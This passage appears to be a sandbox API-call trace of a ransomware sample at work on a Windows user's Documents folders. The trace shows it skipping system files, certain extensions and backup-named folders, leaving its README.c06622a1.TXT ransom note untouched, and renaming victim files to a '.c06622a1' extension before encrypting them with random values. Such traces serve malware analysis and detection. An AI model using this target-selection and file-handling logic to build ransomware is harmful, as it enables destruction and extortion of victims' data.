Length=0x80) returned 0x4c251b74 [0158.798] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.798] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.798] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.798] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.798] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0158.799] _wcsicmp (_Str1="backup", _Str2="ryzV8yuUzx3uE") returned -16 [0158.799] wcslen (_String="backup") returned 0x6 [0158.799] _wcsicmp (_Str1="bak", _Str2="ryzV8yuUzx3uE") returned -16 [0158.799] wcslen (_String="bak") returned 0x3 [0158.799] _wcsicmp (_Str1="back", _Str2="ryzV8yuUzx3uE") returned -16 [0158.799] wcslen (_String="back") returned 0x4 [0158.799] _wcsicmp (_Str1="archive", _Str2="ryzV8yuUzx3uE") returned -17 [0158.799] wcslen (_String="archive") returned 0x7 [0158.799] _wcsicmp (_Str1="bckp", _Str2="ryzV8yuUzx3uE") returned -16 [0158.799] wcslen (_String="bckp") returned 0x4 [0158.799] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.800] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.802] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3543ade0, ftCreationTime.dwHighDateTime=0x1d5df60, ftLastAccessTime.dwLowDateTime=0x642df830, ftLastAccessTime.dwHighDateTime=0x1d5dca0, ftLastWriteTime.dwLowDateTime=0x642df830, ftLastWriteTime.dwHighDateTime=0x1d5dca0, nFileSizeHigh=0x0, nFileSizeLow=0xf91a, dwReserved0=0x0, dwReserved1=0x0, cFileName="wvlxx6pNXiS.ppt", cAlternateFileName="WVLXX6~1.PPT")) returned 1 [0158.802] _wcsicmp (_Str1="wvlxx6pNXiS.ppt", _Str2="README.c06622a1.TXT") returned 5 [0158.802] wcsstr (_Str="wvlxx6pNXiS.ppt", _SubStr="README") returned 0x0 [0158.802] _wcsicmp (_Str1="autorun.inf", _Str2="wvlxx6pNXiS.ppt") returned -22 [0158.802] wcslen (_String="autorun.inf") returned 0xb [0158.802] _wcsicmp (_Str1="boot.ini", _Str2="wvlxx6pNXiS.ppt") returned -21 [0158.802] wcslen (_String="boot.ini") returned 0x8 [0158.802] _wcsicmp (_Str1="bootfont.bin", _Str2="wvlxx6pNXiS.ppt") returned -21 [0158.802] wcslen (_String="bootfont.bin") returned 0xc [0158.802] _wcsicmp (_Str1="bootsect.bak", _Str2="wvlxx6pNXiS.ppt") returned -21 [0158.802] wcslen (_String="bootsect.bak") returned 0xc [0158.802] _wcsicmp (_Str1="desktop.ini", _Str2="wvlxx6pNXiS.ppt") returned -19 [0158.802] wcslen (_String="desktop.ini") returned 0xb [0158.802] _wcsicmp (_Str1="iconcache.db", _Str2="wvlxx6pNXiS.ppt") returned -14 [0158.802] wcslen (_String="iconcache.db") returned 0xc [0158.802] _wcsicmp (_Str1="ntldr", _Str2="wvlxx6pNXiS.ppt") returned -9 [0158.802] wcslen (_String="ntldr") returned 0x5 [0158.802] _wcsicmp (_Str1="ntuser.dat", _Str2="wvlxx6pNXiS.ppt") returned -9 [0158.802] wcslen (_String="ntuser.dat") returned 0xa [0158.802] _wcsicmp (_Str1="ntuser.dat.log", _Str2="wvlxx6pNXiS.ppt") returned -9 [0158.802] wcslen (_String="ntuser.dat.log") returned 0xe [0158.803] _wcsicmp (_Str1="ntuser.ini", _Str2="wvlxx6pNXiS.ppt") returned -9 [0158.803] wcslen (_String="ntuser.ini") returned 0xa [0158.803] _wcsicmp (_Str1="thumbs.db", _Str2="wvlxx6pNXiS.ppt") returned -3 [0158.803] wcslen (_String="thumbs.db") returned 0x9 [0158.803] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0158.803] wcslen (_String="386") returned 0x3 [0158.803] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0158.803] wcslen (_String="adv") returned 0x3 [0158.803] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0158.803] wcslen (_String="ani") returned 0x3 [0158.803] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0158.803] wcslen (_String="bat") returned 0x3 [0158.803] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0158.803] wcslen (_String="bin") returned 0x3 [0158.803] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0158.803] wcslen (_String="cab") returned 0x3 [0158.803] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0158.803] wcslen (_String="cmd") returned 0x3 [0158.803] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0158.803] wcslen (_String="com") returned 0x3 [0158.803] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0158.803] wcslen (_String="cpl") returned 0x3 [0158.803] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0158.804] wcslen (_String="cur") returned 0x3 [0158.804] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0158.804] wcslen (_String="deskthemepack") returned 0xd [0158.804] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0158.804] wcslen (_String="diagcab") returned 0x7 [0158.804] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0158.804] wcslen (_String="diagcfg") returned 0x7 [0158.804] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0158.804] wcslen (_String="diagpkg") returned 0x7 [0158.804] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0158.804] wcslen (_String="dll") returned 0x3 [0158.804] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0158.804] wcslen (_String="drv") returned 0x3 [0158.804] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0158.804] wcslen (_String="exe") returned 0x3 [0158.804] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0158.804] wcslen (_String="hlp") returned 0x3 [0158.804] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0158.804] wcslen (_String="icl") returned 0x3 [0158.804] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0158.804] wcslen (_String="icns") returned 0x4 [0158.804] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0158.804] wcslen (_String="ico") returned 0x3 [0158.805] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0158.805] wcslen (_String="ics") returned 0x3 [0158.805] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0158.805] wcslen (_String="idx") returned 0x3 [0158.805] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0158.805] wcslen (_String="ldf") returned 0x3 [0158.805] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0158.805] wcslen (_String="lnk") returned 0x3 [0158.805] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0158.805] wcslen (_String="mod") returned 0x3 [0158.805] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0158.805] wcslen (_String="mpa") returned 0x3 [0158.805] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0158.805] wcslen (_String="msc") returned 0x3 [0158.805] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0158.805] wcslen (_String="msp") returned 0x3 [0158.805] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0158.805] wcslen (_String="msstyles") returned 0x8 [0158.805] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0158.805] wcslen (_String="msu") returned 0x3 [0158.805] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0158.805] wcslen (_String="nls") returned 0x3 [0158.805] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0158.806] wcslen (_String="nomedia") returned 0x7 [0158.806] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0158.806] wcslen (_String="ocx") returned 0x3 [0158.806] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0158.806] wcslen (_String="prf") returned 0x3 [0158.806] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0158.806] wcslen (_String="ps1") returned 0x3 [0158.806] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0158.806] wcslen (_String="rom") returned 0x3 [0158.806] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0158.806] wcslen (_String="rtp") returned 0x3 [0158.806] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0158.806] wcslen (_String="scr") returned 0x3 [0158.806] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0158.806] wcslen (_String="shs") returned 0x3 [0158.806] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0158.806] wcslen (_String="spl") returned 0x3 [0158.806] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0158.806] wcslen (_String="sys") returned 0x3 [0158.806] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0158.806] wcslen (_String="theme") returned 0x5 [0158.806] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0158.806] wcslen (_String="themepack") returned 0x9 [0158.806] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0158.807] wcslen (_String="wpx") returned 0x3 [0158.807] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0158.807] wcslen (_String="lock") returned 0x4 [0158.807] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0158.807] wcslen (_String="key") returned 0x3 [0158.807] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0158.807] wcslen (_String="hta") returned 0x3 [0158.807] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0158.807] wcslen (_String="msi") returned 0x3 [0158.807] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0158.807] wcslen (_String="pdb") returned 0x3 [0158.807] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0158.807] wcslen (_String="sqlite") returned 0x6 [0158.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac")) returned 0x10 [0158.807] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.807] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" [0158.807] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned 0x46 [0158.807] wcscpy (in: _Dest=0x3270106, _Source="wvlxx6pNXiS.ppt" | out: _Dest="wvlxx6pNXiS.ppt") returned="wvlxx6pNXiS.ppt" [0158.807] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt", dwFileAttributes=0x80) returned 1 [0158.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\wvlxx6pnxis.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0158.808] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.808] ReadFile (in: hFile=0x1b4, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0158.809] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xea19e333 [0158.809] RtlComputeCrc32 (PartialCrc=0xe333, Buffer=0x32e724, Length=0x80) returned 0x94fbd02d [0158.809] RtlComputeCrc32 (PartialCrc=0xd02d, Buffer=0x32e724, Length=0x80) returned 0x66fd7c34 [0158.809] RtlComputeCrc32 (PartialCrc=0x7c34, Buffer=0x32e724, Length=0x80) returned 0x3a2148c8 [0158.809] RtlComputeCrc32 (PartialCrc=0x48c8, Buffer=0x32e724, Length=0x80) returned 0xc1b951cf [0158.809] CloseHandle (hObject=0x1b4) returned 1 [0158.809] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.809] wcscpy (in: _Dest=0x3280080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt" [0158.809] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt") returned 0x56 [0158.809] wcscpy (in: _Dest=0x328012c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.809] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\wvlxx6pnxis.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\wvlxx6pnxis.ppt.c06622a1"), dwFlags=0x8) returned 1 [0158.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\wvlxx6pNXiS.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\wvlxx6pnxis.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0158.812] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.812] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x9c5345f [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d964c50 [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4eb32f1c [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a080671 [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64415e90 [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d80dd6f [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x689716a5 [0158.821] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14bb2023 [0158.824] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0xff369217 [0158.824] RtlComputeCrc32 (PartialCrc=0x9217, Buffer=0x36c0094, Length=0x80) returned 0x5d5e80df [0158.824] RtlComputeCrc32 (PartialCrc=0x80df, Buffer=0x36c0094, Length=0x80) returned 0x614798c3 [0158.824] RtlComputeCrc32 (PartialCrc=0x98c3, Buffer=0x36c0094, Length=0x80) returned 0x86500348 [0158.824] RtlComputeCrc32 (PartialCrc=0x348, Buffer=0x36c0094, Length=0x80) returned 0x7042741b [0158.824] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.825] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.826] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.827] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.827] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0158.827] _wcsicmp (_Str1="backup", _Str2="QNlgQkm9Qwac") returned -15 [0158.827] wcslen (_String="backup") returned 0x6 [0158.827] _wcsicmp (_Str1="bak", _Str2="QNlgQkm9Qwac") returned -15 [0158.827] wcslen (_String="bak") returned 0x3 [0158.827] _wcsicmp (_Str1="back", _Str2="QNlgQkm9Qwac") returned -15 [0158.827] wcslen (_String="back") returned 0x4 [0158.827] _wcsicmp (_Str1="archive", _Str2="QNlgQkm9Qwac") returned -16 [0158.827] wcslen (_String="archive") returned 0x7 [0158.827] _wcsicmp (_Str1="bckp", _Str2="QNlgQkm9Qwac") returned -15 [0158.827] wcslen (_String="bckp") returned 0x4 [0158.828] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.830] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.833] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8beb6fc0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8beb6fc0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8beb6fc0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.833] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.833] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd43ec80, ftCreationTime.dwHighDateTime=0x1d5e17d, ftLastAccessTime.dwLowDateTime=0xe3b1ac70, ftLastAccessTime.dwHighDateTime=0x1d5dadc, ftLastWriteTime.dwLowDateTime=0xe3b1ac70, ftLastWriteTime.dwHighDateTime=0x1d5dadc, nFileSizeHigh=0x0, nFileSizeLow=0x555, dwReserved0=0x0, dwReserved1=0x0, cFileName="vUMtlYMl.docx", cAlternateFileName="VUMTLY~1.DOC")) returned 1 [0158.833] _wcsicmp (_Str1="vUMtlYMl.docx", _Str2="README.c06622a1.TXT") returned 4 [0158.833] wcsstr (_Str="vUMtlYMl.docx", _SubStr="README") returned 0x0 [0158.833] _wcsicmp (_Str1="autorun.inf", _Str2="vUMtlYMl.docx") returned -21 [0158.833] wcslen (_String="autorun.inf") returned 0xb [0158.834] _wcsicmp (_Str1="boot.ini", _Str2="vUMtlYMl.docx") returned -20 [0158.834] wcslen (_String="boot.ini") returned 0x8 [0158.834] _wcsicmp (_Str1="bootfont.bin", _Str2="vUMtlYMl.docx") returned -20 [0158.834] wcslen (_String="bootfont.bin") returned 0xc [0158.834] _wcsicmp (_Str1="bootsect.bak", _Str2="vUMtlYMl.docx") returned -20 [0158.834] wcslen (_String="bootsect.bak") returned 0xc [0158.834] _wcsicmp (_Str1="desktop.ini", _Str2="vUMtlYMl.docx") returned -18 [0158.834] wcslen (_String="desktop.ini") returned 0xb [0158.834] _wcsicmp (_Str1="iconcache.db", _Str2="vUMtlYMl.docx") returned -13 [0158.834] wcslen (_String="iconcache.db") returned 0xc [0158.834] _wcsicmp (_Str1="ntldr", _Str2="vUMtlYMl.docx") returned -8 [0158.834] wcslen (_String="ntldr") returned 0x5 [0158.834] _wcsicmp (_Str1="ntuser.dat", _Str2="vUMtlYMl.docx") returned -8 [0158.834] wcslen (_String="ntuser.dat") returned 0xa [0158.834] _wcsicmp (_Str1="ntuser.dat.log", _Str2="vUMtlYMl.docx") returned -8 [0158.834] wcslen (_String="ntuser.dat.log") returned 0xe [0158.834] _wcsicmp (_Str1="ntuser.ini", _Str2="vUMtlYMl.docx") returned -8 [0158.834] wcslen (_String="ntuser.ini") returned 0xa [0158.834] _wcsicmp (_Str1="thumbs.db", _Str2="vUMtlYMl.docx") returned -2 [0158.834] wcslen (_String="thumbs.db") returned 0x9 [0158.834] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0158.834] wcslen (_String="386") returned 0x3 [0158.834] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0158.834] wcslen (_String="adv") returned 0x3 [0158.835] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0158.835] wcslen (_String="ani") returned 0x3 [0158.835] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0158.835] wcslen (_String="bat") returned 0x3 [0158.835] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0158.835] wcslen (_String="bin") returned 0x3 [0158.835] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0158.835] wcslen (_String="cab") returned 0x3 [0158.835] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0158.835] wcslen (_String="cmd") returned 0x3 [0158.835] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0158.835] wcslen (_String="com") returned 0x3 [0158.835] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0158.835] wcslen (_String="cpl") returned 0x3 [0158.835] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0158.835] wcslen (_String="cur") returned 0x3 [0158.835] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0158.835] wcslen (_String="deskthemepack") returned 0xd [0158.835] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0158.835] wcslen (_String="diagcab") returned 0x7 [0158.835] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0158.835] wcslen (_String="diagcfg") returned 0x7 [0158.835] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0158.835] wcslen (_String="diagpkg") returned 0x7 [0158.836] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0158.836] wcslen (_String="dll") returned 0x3 [0158.836] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0158.836] wcslen (_String="drv") returned 0x3 [0158.836] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0158.836] wcslen (_String="exe") returned 0x3 [0158.836] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0158.836] wcslen (_String="hlp") returned 0x3 [0158.836] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0158.836] wcslen (_String="icl") returned 0x3 [0158.836] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0158.836] wcslen (_String="icns") returned 0x4 [0158.836] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0158.836] wcslen (_String="ico") returned 0x3 [0158.836] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0158.836] wcslen (_String="ics") returned 0x3 [0158.836] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0158.836] wcslen (_String="idx") returned 0x3 [0158.836] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0158.836] wcslen (_String="ldf") returned 0x3 [0158.836] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0158.836] wcslen (_String="lnk") returned 0x3 [0158.836] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0158.836] wcslen (_String="mod") returned 0x3 [0158.836] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0158.837] wcslen (_String="mpa") returned 0x3 [0158.837] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0158.837] wcslen (_String="msc") returned 0x3 [0158.837] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0158.837] wcslen (_String="msp") returned 0x3 [0158.837] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0158.837] wcslen (_String="msstyles") returned 0x8 [0158.837] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0158.837] wcslen (_String="msu") returned 0x3 [0158.837] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0158.837] wcslen (_String="nls") returned 0x3 [0158.837] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0158.837] wcslen (_String="nomedia") returned 0x7 [0158.837] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0158.837] wcslen (_String="ocx") returned 0x3 [0158.837] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0158.837] wcslen (_String="prf") returned 0x3 [0158.837] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0158.837] wcslen (_String="ps1") returned 0x3 [0158.837] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0158.837] wcslen (_String="rom") returned 0x3 [0158.837] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0158.837] wcslen (_String="rtp") returned 0x3 [0158.837] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0158.838] wcslen (_String="scr") returned 0x3 [0158.838] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0158.838] wcslen (_String="shs") returned 0x3 [0158.838] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0158.838] wcslen (_String="spl") returned 0x3 [0158.838] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0158.838] wcslen (_String="sys") returned 0x3 [0158.838] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0158.838] wcslen (_String="theme") returned 0x5 [0158.838] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0158.838] wcslen (_String="themepack") returned 0x9 [0158.838] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0158.838] wcslen (_String="wpx") returned 0x3 [0158.838] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0158.838] wcslen (_String="lock") returned 0x4 [0158.838] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0158.838] wcslen (_String="key") returned 0x3 [0158.838] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0158.838] wcslen (_String="hta") returned 0x3 [0158.838] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0158.838] wcslen (_String="msi") returned 0x3 [0158.838] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0158.838] wcslen (_String="pdb") returned 0x3 [0158.839] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0158.839] wcslen (_String="sqlite") returned 0x6 [0158.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.839] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.839] wcscpy (in: _Dest=0x3240060, 